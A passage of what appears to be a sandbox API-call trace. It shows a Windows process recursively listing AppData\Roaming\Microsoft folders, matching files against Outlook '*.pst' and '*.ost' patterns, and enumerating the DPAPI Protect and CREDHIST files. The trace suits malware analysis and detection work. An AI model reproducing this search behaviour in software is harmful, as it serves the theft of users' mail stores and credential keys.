(hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.225] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Network" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network" [0251.225] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\*" [0251.225] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0f2b0 [0251.227] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.227] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.227] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.227] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.227] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.227] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network", pszFile="Connections" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0251.227] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0251.227] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c0f310 [0251.229] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.229] FindNextFileW (in: hFindFile=0x5c0f310, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.229] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.229] FindNextFileW (in: hFindFile=0x5c0f310, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.229] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.229] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="Pbk" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0251.229] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0251.229] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5c103f0 [0251.231] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.231] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.231] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.231] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.231] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.231] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="_hiddenPbk" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0251.231] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0251.231] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0ee90 [0251.231] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.231] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0251.231] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.231] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0251.231] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.231] PathMatchSpecW (pszFile="rasphone.pbk", pszSpec="*.pst") returned 0 [0251.231] PathMatchSpecW (pszFile="rasphone.pbk", pszSpec="*.ost") returned 0 [0251.231] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0 [0251.231] FindClose (in: hFindFile=0x5c0ee90 | out: hFindFile=0x5c0ee90) returned 1 [0251.232] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0251.232] FindClose (in: hFindFile=0x5c103f0 | out: hFindFile=0x5c103f0) returned 1 [0251.232] FindNextFileW (in: hFindFile=0x5c0f310, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0251.232] FindClose (in: hFindFile=0x5c0f310 | out: hFindFile=0x5c0f310) returned 1 [0251.232] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.232] FindClose (in: hFindFile=0x5c0f2b0 | out: hFindFile=0x5c0f2b0) returned 1 [0251.232] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.232] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.232] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Office" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office" [0251.232] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\*" [0251.232] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0f310 [0251.233] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.233] FindNextFileW (in: hFindFile=0x5c0f310, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.233] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.233] FindNextFileW (in: hFindFile=0x5c0f310, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.233] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.233] PathMatchSpecW (pszFile="MSO1033.acl", pszSpec="*.pst") returned 0 [0251.233] PathMatchSpecW (pszFile="MSO1033.acl", pszSpec="*.ost") returned 0 [0251.234] FindNextFileW (in: hFindFile=0x5c0f310, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.234] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.234] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office", pszFile="Recent" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0251.234] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0251.234] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c103f0 [0251.236] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.236] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.237] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.237] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.237] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.237] PathMatchSpecW (pszFile="Database1.LNK", pszSpec="*.pst") returned 0 [0251.237] PathMatchSpecW (pszFile="Database1.LNK", pszSpec="*.ost") returned 0 [0251.237] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.237] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.237] PathMatchSpecW (pszFile="Documents.LNK", pszSpec="*.pst") returned 0 [0251.237] PathMatchSpecW (pszFile="Documents.LNK", pszSpec="*.ost") returned 0 [0251.237] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.237] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.237] PathMatchSpecW (pszFile="Global.LNK", pszSpec="*.pst") returned 0 [0251.237] PathMatchSpecW (pszFile="Global.LNK", pszSpec="*.ost") returned 0 [0251.237] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.237] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.237] PathMatchSpecW (pszFile="index.dat", pszSpec="*.pst") returned 0 [0251.237] PathMatchSpecW (pszFile="index.dat", pszSpec="*.ost") returned 0 [0251.237] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.237] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.237] PathMatchSpecW (pszFile="Templates.LNK", pszSpec="*.pst") returned 0 [0251.237] PathMatchSpecW (pszFile="Templates.LNK", pszSpec="*.ost") returned 0 [0251.237] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0251.237] FindClose (in: hFindFile=0x5c103f0 | out: hFindFile=0x5c103f0) returned 1 [0251.238] FindNextFileW (in: hFindFile=0x5c0f310, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.238] FindClose (in: hFindFile=0x5c0f310 | out: hFindFile=0x5c0f310) returned 1 [0251.238] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.238] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.238] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="OneNote" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote" [0251.238] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\*" [0251.238] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0ee90 [0251.243] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.243] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.243] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.243] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.243] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.243] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote", pszFile="16.0" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0" [0251.243] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*" [0251.243] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c0feb0 [0251.243] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.243] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.243] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.243] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.243] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.244] PathMatchSpecW (pszFile="Preferences.dat", pszSpec="*.pst") returned 0 [0251.244] PathMatchSpecW (pszFile="Preferences.dat", pszSpec="*.ost") returned 0 [0251.244] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0251.244] FindClose (in: hFindFile=0x5c0feb0 | out: hFindFile=0x5c0feb0) returned 1 [0251.244] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.244] FindClose (in: hFindFile=0x5c0ee90 | out: hFindFile=0x5c0ee90) returned 1 [0251.244] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.244] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.244] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Outlook" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook" [0251.244] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0251.244] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0f970 [0251.249] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.249] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.249] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.249] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.249] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.249] PathMatchSpecW (pszFile="Outlook.srs", pszSpec="*.pst") returned 0 [0251.249] PathMatchSpecW (pszFile="Outlook.srs", pszSpec="*.ost") returned 0 [0251.249] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.249] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.249] PathMatchSpecW (pszFile="Outlook.xml", pszSpec="*.pst") returned 0 [0251.249] PathMatchSpecW (pszFile="Outlook.xml", pszSpec="*.ost") returned 0 [0251.249] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.249] FindClose (in: hFindFile=0x5c0f970 | out: hFindFile=0x5c0f970) returned 1 [0251.249] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.249] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.249] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="PowerPoint" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint" [0251.249] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\*" [0251.249] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0f970 [0251.250] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.250] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.250] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.250] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.250] FindClose (in: hFindFile=0x5c0f970 | out: hFindFile=0x5c0f970) returned 1 [0251.250] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.250] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.250] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Proof" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof" [0251.250] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\*" [0251.250] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0ee90 [0251.252] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.252] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.252] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.252] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.252] FindClose (in: hFindFile=0x5c0ee90 | out: hFindFile=0x5c0ee90) returned 1 [0251.252] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.252] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.252] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Protect" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect" [0251.252] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\*" [0251.252] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0ee90 [0251.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.253] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.253] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.253] PathMatchSpecW (pszFile="CREDHIST", pszSpec="*.pst") returned 0 [0251.253] PathMatchSpecW (pszFile="CREDHIST", pszSpec="*.ost") returned 0 [0251.253] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.253] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-1462094071-1423818996-289466292-1000" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000" [0251.253] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\*" [0251.253] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c0f970 [0251.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.253] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.253] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.253] PathMatchSpecW (pszFile="04cd465a-248d-4abd-853a-5cb67fe43510", pszSpec="*.pst") returned 0 [0251.253] PathMatchSpecW (pszFile="04cd465a-248d-4abd-853a-5cb67fe43510", pszSpec="*.ost") returned 0 [0251.253] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.253] PathMatchSpecW (pszFile="15d22704-736b-416f-a36b-857f2a5d2a7e", pszSpec="*.pst") returned 0 [0251.253] PathMatchSpecW (pszFile="15d22704-736b-416f-a36b-857f2a5d2a7e", pszSpec="*.ost") returned 0 [0251.253] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.254] PathMatchSpecW (pszFile="496f2c5b-a90f-4380-b805-3bf6ac63451b", pszSpec="*.pst") returned 0 [0251.254] PathMatchSpecW (pszFile="496f2c5b-a90f-4380-b805-3bf6ac63451b", pszSpec="*.ost") returned 0 [0251.254] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.254] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.254] PathMatchSpecW (pszFile="5b8a3202-35dc-4437-b5d7-374f5e872415", pszSpec="*.pst") returned 0 [0251.254] PathMatchSpecW (pszFile="5b8a3202-35dc-4437-b5d7-374f5e872415", pszSpec="*.ost") returned 0 [0251.254] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.254] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.254] PathMatchSpecW (pszFile="d7746ecf-458e-4e71-8557-8ac80457022a", pszSpec="*.pst") returned 0 [0251.254] PathMatchSpecW (pszFile="d7746ecf-458e-4e71-8557-8ac80457022a", pszSpec="*.ost") returned 0 [0251.254] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.254] WaitForSingleObject (hHandle=0x458, 